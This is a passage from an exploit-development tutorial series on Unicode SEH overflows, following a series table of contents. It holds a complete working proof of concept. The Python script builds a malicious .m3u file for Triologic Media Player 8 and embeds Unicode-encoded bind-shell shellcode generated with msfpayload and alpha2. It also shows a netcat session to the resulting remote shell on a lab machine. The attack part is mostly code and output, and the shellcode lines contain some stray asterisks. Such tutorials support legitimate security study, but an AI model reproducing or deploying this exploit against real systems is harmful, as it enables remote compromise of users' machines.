- Part 1: Introduction to Exploit Development
- Part 2: Saved Return Pointer Overflows
- Part 3: Structured Exception Handler (SEH)
- Part 4: Egg Hunters
- Part 5: Unicode 0x00410041
- Part 6: Writing WIN32 Shellcode
- Part 7: Return Oriented Programming (ROP)
- Part 8: Heap Spraying, Part 1 [Overwriting EIP]
- Part 9: Heap Spraying [Chapter 2: UAF]
- Part 10: Kernel Exploitation: Stack Overflow
- Part 11: Kernel Exploitation: Arbitrary Write (Write-What-Where)
- Part 12: Kernel Exploitation: Null Pointer Dereference
- Part 13: Kernel Exploitation: Uninitialized Stack Variable
- Part 14: Kernel Exploitation: Integer Overflow
- Part 15: Kernel Exploitation: UAF
- Part 16: Kernel Exploitation: Pool Overflow
- Part 17: Kernel Exploitation: Arbitrary Write (Write-What-Where)
- Part 18: Kernel Exploitation: RS2 Bitmap Necromancy
- Part 19: Kernel Exploitation: Razer
Shellcode + Game Over
At this point the game really is over. All that is left is to generate some Unicode-compatible shellcode, and thanks to SkyLined's work that is easy: his alpha2 encoder wraps raw shellcode in an alphanumeric decoder stub that survives the ANSI-to-Unicode conversion unchanged. Download the C source and compile it with gcc. The syntax for producing the shellcode is as follows:
root@bt:/pentest/alpha2# msfpayload -l
[...snip...]
windows/shell/reverse_tcp_dns    Connect back to the attacker, Spawn a piped command shell (staged)
windows/shell_bind_tcp           Listen for a connection and spawn a command shell
windows/shell_bind_tcp_xpfw      Disable the Windows ICF, then listen for a connection and spawn a command shell
[...snip...]
root@bt:/pentest/alpha2# msfpayload windows/shell_bind_tcp O
       Name: Windows Command Shell, Bind TCP Inline
     Module: payload/windows/shell_bind_tcp
    Version: 8642
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 341
       Rank: Normal
Provided by:
  vlad902 <vlad902@gmail.com>
  sf <stephen_fewer@harmonysecurity.com>
Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LPORT     4444             yes       The listen port
RHOST                      no        The target address
Description:
  Listen for a connection and spawn a command shell
root@bt:/pentest/alpha2# msfpayload windows/shell_bind_tcp LPORT=9988 R > bindshell9988.raw
root@bt:/pentest/alpha2# ./alpha2 eax --unicode --uppercase < bindshell9988.raw
PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1
AYAZBABABABAB30APB944JBKLK8CYKPM0KPQP59ZEP18RQTTKQBNP4KQBLLTK0RLTDKCBMXLOWGOZO6NQKONQ7PVLOLC13LKRNLO0GQHOL
MKQY7YRL022R74KPRLP4KPBOLKQJ0TKOPSHSU7PD4OZKQ8PPPTKQ8LX4KQHO0M1ICJCOLOYTK04TKM1YFP1KONQ7P6L7QXOLMKQ7W08K0R
UZTM33ML8OKCMO4SEYRQHTKPXO4KQICQV4KLLPK4KR8MLKQHSTKKT4KKQJ0SYOTO4NDQKQK1Q0Y1JPQKOIPB8QOQJTKMBJKTFQM38NSOBK
PKPQXBWBSNRQOB4QXPLBWN***KO8UWHDPM1KPKPNIWTPTPPBHO9SPRKKPKOJ50P20PP0P10PP10R0S89ZLOIOYPKO9EE9XGNQ9K1CRHM2K
PNGKTTIK61ZLP0V0WBH7RYKOGS7KOXU0SPWQX7GIYOHKOKOZ50SB3R7C83DZLOKK1KO8UQGTIGWS8RURN0M1QKO8URHRC2MQTKPTIK31G0
WPWNQL6QZMBR9R6JBKM1VY7OTMTOLM1KQTMOTO4N096KPQ4B4PPQF0VPVOV26PNB6R6B3QF1X3IHLOO3VKOHUTIK00NR6PFKONP38LHU7M
MQPKOXUGKJPGEVBPV38G6F5GM5MKOXUOLLF3LKZCPKKIPBUM57KOWMCSBRO2JM0PSKO9EA
When encoding the shellcode, make sure to tell alpha2 which register will point at the shellcode when it starts executing (eax here, which is why the alignment stub leaves the shellcode address in EAX); the decoder that alpha2 prepends uses that register as its base address. Also keep in mind what the Venetian padding actually does once expanded: 00 71 00 is ADD BYTE PTR [ECX], DH, a memory write, so ECX must point at writable memory while the stub runs or it will fault before reaching the shellcode. With some comments added, the final POC looks like this:
#!/usr/bin/python -w
#-------------------------------------------------------------------------------#
# Exploit: Triologic Media Player 8 (.m3u) SEH Unicode                          #
# Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com/                   #
# OS: WinXP PRO SP3                                                             #
# Software: http://download.cnet.com/Triologic-Media-Player/                    #
#           3000-2139_4-10691520.html                                           #
#-------------------------------------------------------------------------------#
# This exploit was created for Part 5 of my Exploit Development tutorial        #
# series - http://www.fuzzysecurity.com/tutorials/expDev/5.html                 #
#-------------------------------------------------------------------------------#
# root@bt:/pentest/alpha2# nc -nv 192.168.111.128 9988                          #
# (UNKNOWN) [192.168.111.128] 9988 (?) open                                     #
# Microsoft Windows XP [Version 5.1.2600]                                       #
# (C) Copyright 1985-2001 Microsoft Corp.                                       #
#                                                                               #
# C:\Documents and Settings\Administrator\Desktop>                              #
#-------------------------------------------------------------------------------#

filename="evil.m3u"

#---------------------SEH-Structure---------------------#
#nSEH => \x41\x71 => 41       INC ECX                   #
#                    0071 00  ADD BYTE PTR DS:[ECX],DH  #
#SEH  => \xF2\x41 => F2:      PREFIX REPNE:             #
#                    0041 00  ADD BYTE PTR DS:[ECX],AL  #
#-------------------------------------------------------#
#0x004100f2 : pop esi # pop ebx # ret 04 | triomp8.exe  #
#-------------------------------------------------------#
SEH = "\x41\x71" + "\xF2\x41"

#-----------------------Alignment-----------------------#
#After we step through nSEH and SEH if look at the dump #
#of the CPU registers we can see several which are close#
#to our Shellcode, I chose EBP. Time for some Venetian  #
#Black-Magic alignment...                               #
#-------------------------------------------------------#
align = (
"\x55"          #push EBP
"\x71"          #Venetian Padding
"\x58"          #pop EAX
"\x71"          #Venetian Padding
"\x05\x20\x11"  #add eax,0x11002000  \
"\x71"          #Venetian Padding     |> net +0x900
"\x2d\x17\x11"  #sub eax,0x11001700  /
"\x71"          #Venetian Padding
"\x50"          #push EAX
"\x71"          #Venetian Padding
"\xC3")         #RETN

#We need to pad our buffer to the place of our alignment in EAX
filler = "\x58"*117

#---------------------------------------Shellcode---------------------------------------------#
#root@bt:/pentest/alpha2# msfpayload windows/shell_bind_tcp LPORT=9988 R > bindshell9988.raw  #
#root@bt:/pentest/alpha2# ./alpha2 eax --unicode --uppercase < bindshell9988.raw              #
#---------------------------------------------------------------------------------------------#
Shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1"
"AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA"
"BAB30APB944JBKLK8CYKPM0KPQP59ZEP18RQTTKQBNP4KQBLLTK0RLTDKC"
"BMXLOWGOZO6NQKONQ7PVLOLC13LKRNLO0GQHOLMKQY7YRL022R74KPRLP4"
"KPBOLKQJ0TKOPSHSU7PD4OZKQ8PPPTKQ8LX4KQHO0M1ICJCOLOYTK04TKM"
"1YFP1KONQ7P6L7QXOLMKQ7W08K0RUZTM33ML8OKCMO4SEYRQHTKPXO4KQI"
"CQV4KLLPK4KR8MLKQHSTKKT4KKQJ0SYOTO4NDQKQK1Q0Y1JPQKOIPB8QOQ"
"JTKMBJKTFQM38NSOBKPKPQXBWBSNRQOB4QXPLBWN***KO8UWHDPM1KPKPN"
"IWTPTPPBHO9SPRKKPKOJ50P20PP0P10PP10R0S89ZLOIOYPKO9EE9XGNQ9"
"K1CRHM2KPNGKTTIK61ZLP0V0WBH7RYKOGS7KOXU0SPWQX7GIYOHKOKOZ50"
"SB3R7C83DZLOKK1KO8UQGTIGWS8RURN0M1QKO8URHRC2MQTKPTIK31G0WP"
"WNQL6QZMBR9R6JBKM1VY7OTMTOLM1KQTMOTO4N096KPQ4B4PPQF0VPVOV2"
"6PNB6R6B3QF1X3IHLOO3VKOHUTIK00NR6PFKONP38LHU7MMQPKOXUGKJPG"
"EVBPV38G6F5GM5MKOXUOLLF3LKZCPKKIPBUM57KOWMCSBRO2JM0PSKO9EA")

boom = SEH + align + filler + Shellcode
buffer = "\x90"*536 + boom + "B"*(4466-len(boom))

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
In the figure below we can see that EAX points exactly at our shellcode. Open the POC in the player and then run
netstat -an
and the bind shell is listening. Game over!!


root@bt:/pentest/alpha2# nc -nv 192.168.111.128 9988
(UNKNOWN) [192.168.111.128] 9988 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.111.128
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
C:\Documents and Settings\Administrator\Desktop>